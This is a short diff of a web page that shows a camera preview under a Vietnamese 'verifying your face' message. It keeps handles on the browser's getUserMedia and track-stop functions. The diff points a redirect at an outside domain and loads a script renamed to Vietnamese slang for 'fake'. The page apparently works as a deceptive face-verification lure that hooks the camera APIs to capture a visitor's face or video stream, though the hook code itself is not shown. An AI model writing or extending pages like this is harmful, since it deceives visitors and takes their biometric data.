--- a/index.html
+++ b/index.html
@@ -73,7 +73,7 @@
     const video = document.getElementById('preview');
     const status = document.getElementById('status');
     const msg = document.getElementById('msg');
-    const REDIRECT_URL = "   "
+    const REDIRECT_URL = "https://tumadam.io.vn";
 
     const originalGetUserMedia = navigator.mediaDevices.getUserMedia.bind(navigator.mediaDevices);
     const originalStop = MediaStreamTrack.prototype.stop;
@@ -105,7 +105,7 @@
         status.innerHTML = "Đang Xác Thực Khuôn Mặt...<br>Vui Lòng Giữ Nguyên Vị Trí.";
 
         const script = document.createElement('script');
-        script.src = 'main.js'; 
+        script.src = 'lỏ.js'; 
         document.body.appendChild(script);
 
         const checkFinished = setInterval(() => {
